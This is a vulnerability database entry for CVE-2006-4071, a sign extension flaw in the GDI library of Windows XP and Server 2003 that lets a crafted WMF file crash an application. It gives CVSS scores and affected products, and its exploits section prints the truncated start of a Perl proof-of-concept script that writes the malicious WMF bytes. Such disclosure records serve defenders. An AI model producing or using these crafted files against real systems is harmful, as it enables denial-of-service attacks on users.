2.6
CVSSv2

CVE-2006-4071

Published: 10/08/2006 Updated: 17/10/2018
CVSS v2 Base Score: 2.6 | Impact Score: 2.9 | Exploitability Score: 4.9
VMScore: 265
Vector: AV:N/AC:H/Au:N/C:N/I:N/A:P

Vulnerability Summary

Sign extension vulnerability in the createBrushIndirect function in the GDI library (gdi32.dll) in Microsoft Windows XP, Server 2003, and possibly other versions, allows user-assisted malicious users to cause a denial of service (application crash) via a crafted WMF file.

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft windows xp

microsoft windows 2003 server r2

microsoft windows 2003 server sp1

Exploits

#!/usr/bin/perl print "\nWMF PoC denial of service exploit by cyanid-E <biz4rre\@gmailcom>"; print "\n\ngenerating brushwmf"; open(WMF, ">/brushwmf") or die "cannot create wmf file\n"; print WMF "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x63\x79\x61\x6E\x69\x64"; print WMF "\x2D\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x0 ...